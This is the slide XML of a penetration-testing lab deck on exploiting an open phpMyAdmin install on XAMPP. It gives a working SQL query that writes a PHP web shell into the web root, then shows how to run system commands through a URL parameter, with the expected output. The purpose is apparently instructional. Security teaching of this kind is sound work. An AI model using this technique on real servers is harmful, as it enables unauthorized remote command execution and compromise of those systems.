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36" d="100"/>
          <a:sy n="36" d="100"/>
        </p:scale>
        <p:origin x="9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F8A2-5D41-0F62-DC0B-C0486840AC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051995-5332-CC63-A05D-8BDA061BDD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E4DD0-2DD2-928A-D92C-58D6630D5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864-0276-4456-888F-B70D06E2B4DA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FE8D45-FC52-5CD9-CC42-7956F831D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0550F-3A47-EB3B-9674-26D21D1A9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45C6-5D23-4BEF-BB07-28D30E17D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828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142B2-6381-0EAA-7423-30B5651A6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5C2C67-F6B7-8B06-DAAE-E3BD975197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4C041-8D91-11F5-D457-919C30DE3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864-0276-4456-888F-B70D06E2B4DA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9D7FB-3B8C-5008-A85E-EEC75867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BD492-5F81-42AE-81B7-9CB859E44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45C6-5D23-4BEF-BB07-28D30E17D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47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62CF8E-AF8B-522E-C4A5-564447C5C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BEE479-00BD-8BAD-D356-C0D401A80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58A3E-EA7D-2F78-0323-7DA1E1250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864-0276-4456-888F-B70D06E2B4DA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A487D-7D8A-22FA-0B49-5607F39D6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64C93-7EFC-D39B-8CA9-FA29FF84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45C6-5D23-4BEF-BB07-28D30E17D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7068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1EA54-598F-B315-0851-5A6D60DC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2B26A-DAEF-9796-31D6-319A0F252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06B48-2BD6-61B1-FDB8-8CCB09F23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864-0276-4456-888F-B70D06E2B4DA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37DBA-A243-6782-27E7-B8D2B6143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41A17-C75D-9617-5DC0-0632314A5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45C6-5D23-4BEF-BB07-28D30E17D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83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4D4C3-B4EE-CAD3-0EF6-E403A5290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9F6FA-3777-6C4C-9BC7-D800569A0F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C47C42-A881-7E3C-1A38-D35C82674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864-0276-4456-888F-B70D06E2B4DA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A4F7D-30EB-86F5-FFD3-332A5EB74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510019-0294-8694-B730-A91B56352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45C6-5D23-4BEF-BB07-28D30E17D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589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DBD39-F465-3670-192B-1CB1F65F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32BA0-26DA-489A-2E66-131A59CE5C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E1212-7857-E815-BBC9-1208EEC2C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8EDA1-B501-746B-C26A-94D4E9DE0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864-0276-4456-888F-B70D06E2B4DA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687C94-D87B-694E-8532-55B5EDCFC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03715-BFF2-60F6-1906-CF831FAB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45C6-5D23-4BEF-BB07-28D30E17D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703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7308F-654D-0A91-4390-2991EF573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1380C-99A9-7A1C-E38B-8F5ADC678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A89E9-22BC-E4C2-A5E8-6D3FBDF332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ECBC5-EB60-84C0-6713-3AD9688AA3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04B849-41B4-718C-CB6C-2475394923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7F9048-CB63-8B29-7E88-5B98670EF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864-0276-4456-888F-B70D06E2B4DA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0F09F-392D-B33F-5E98-55918A627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ED5EAE-DF21-F33A-BACD-B1EDFE749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45C6-5D23-4BEF-BB07-28D30E17D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200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12BAA-EBBF-68CA-C710-3121A505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5770B3-EA7B-5803-4149-CC122B2B1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864-0276-4456-888F-B70D06E2B4DA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1CC6C-A842-E96E-A901-AB78C7188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31892-51C7-9955-A767-746B25C72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45C6-5D23-4BEF-BB07-28D30E17D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713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9215AA-32DA-7FBA-5696-D1C44D68E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864-0276-4456-888F-B70D06E2B4DA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76F32-BFED-6F84-C6C0-8EF53D11F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9D75E-924F-2135-A0CA-25B247F7F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45C6-5D23-4BEF-BB07-28D30E17D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423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10BBE-5AAE-6042-775F-1A8C4702B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A1EF8-AE0D-EFEC-C8AE-4967CC82D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9B8C35-83AF-DB08-944F-50F115A2B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E75987-5AE7-950A-C961-535CD1134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864-0276-4456-888F-B70D06E2B4DA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A7339F-40BF-D7A5-79DA-1AE1AA0CF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9EB02E-4A3E-482D-AF1F-14D3C4AD6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45C6-5D23-4BEF-BB07-28D30E17D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9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B9864-15AE-34E0-B204-7C70C414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DBE5A1-B2D6-C907-0519-1ED683C823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BD124E-8E14-77FC-0F8B-AC5EB0FAB5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CCA086-F54E-57B5-4D19-27B94EDD0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B6864-0276-4456-888F-B70D06E2B4DA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2F21C4-1B76-CBFB-51E4-7A19445A6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E55E1-7076-224F-89FD-71CB2B2F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D45C6-5D23-4BEF-BB07-28D30E17D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23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3ED93-B8D4-4492-7CDE-42F6AAA14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DB9F0-B0AD-DDB4-4471-C1F63FAF28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8F64B-26D7-1C87-4E88-5B35245EEF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FB6864-0276-4456-888F-B70D06E2B4DA}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>31-03-2025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0C86A-E8ED-24C9-A08A-885DF6B85E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FAB1D-E667-4718-7C1A-05C5E5A089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D45C6-5D23-4BEF-BB07-28D30E17DAC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503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27A9F-11A5-B363-FBEC-CF06C3E875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Title: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Exploiting phpMyAdmin for Remote Command Execution</a:t>
            </a:r>
            <a:b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Subtitle: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Ethical Hacking &amp; Penetration Testing</a:t>
            </a:r>
            <a:b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4C2A93-BE91-C6D7-A7B1-57FABB246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Instructor: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Course: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Penetration Testing Lab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9103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2C40-212C-3831-89B0-6BDA7308A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2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Overview of the Exploit</a:t>
            </a:r>
            <a:b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09FF6-F484-709F-4537-94DF0EEE7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Target: </a:t>
            </a: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XAMPP platform with an open phpMyAdmin install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Goal: </a:t>
            </a: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Execute remote commands on the database server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How? </a:t>
            </a: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MySQL queries to write a web shell script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Pre-requisite: Ensure MySQL has file write permissions</a:t>
            </a:r>
          </a:p>
          <a:p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178822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F3B81-43A1-41AA-BA6A-8466AC000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the Target phpMyAdmin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13E9E-AE71-0CD3-6ED7-FA64A5671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Open a browser and go to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://192.168.20.10/phpmyadmin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>•	Log in using known or default credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>•	Click on the SQL tab to execute queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>________________________________________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1272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AA23-2EFE-DC4A-F183-0C9405F2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32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Injecting a PHP Web Shell</a:t>
            </a:r>
            <a:b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DE0B1-350C-F185-8BAE-A496E117F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•	In the SQL tab, enter the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SELECT "&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> system($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>']); ?&gt;" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>INTO OUTFILE "C:\\xampp\\htdocs\\shell.php";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>•	This command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>o	Creates a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> file in the web server directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>o	Embeds a PHP script that executes system commands from the URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>⚠️ Make sure MySQL has permission to write files!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>________________________________________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24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A7BDC-64B2-3528-3190-507A51D62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: Verifying the Web Shell is Created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97F2B-4F3E-E9EB-2EC4-7DEE6FB4C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	Open a browser and go to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://192.168.20.10/shell.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>•	Expected output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Warning: system() [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>function.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]: Cannot execute a blank command in C:\xampp\htdocs\shell.php on line 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>📌 This confirms that the shell script was successfully created but needs a command input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>________________________________________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725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C2A8-BB1D-68ED-29E5-1CF669C54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Executing Commands via Web Shell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999DA-8A85-CC06-B0EA-B39ABB17B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	Append a command to the URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>•	http://192.168.20.10/shell.php?cmd=ipconfig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>•	Expected result:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>o	The server will execute ipconfig and display network details.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>✅ You now have remote command execution on the target system!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>________________________________________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7719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Symbol</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Title: Exploiting phpMyAdmin for Remote Command Execution Subtitle: Ethical Hacking &amp; Penetration Testing </vt:lpstr>
      <vt:lpstr>Overview of the Exploit </vt:lpstr>
      <vt:lpstr>Accessing the Target phpMyAdmin </vt:lpstr>
      <vt:lpstr>Injecting a PHP Web Shell </vt:lpstr>
      <vt:lpstr>: Verifying the Web Shell is Created </vt:lpstr>
      <vt:lpstr> Executing Commands via Web Shell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B. JYOTI RANJAN SAHU</dc:creator>
  <cp:lastModifiedBy>B. JYOTI RANJAN SAHU</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-31T02:07:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-31T02:07:18Z</dcterms:modified>
</cp:coreProperties>
</file>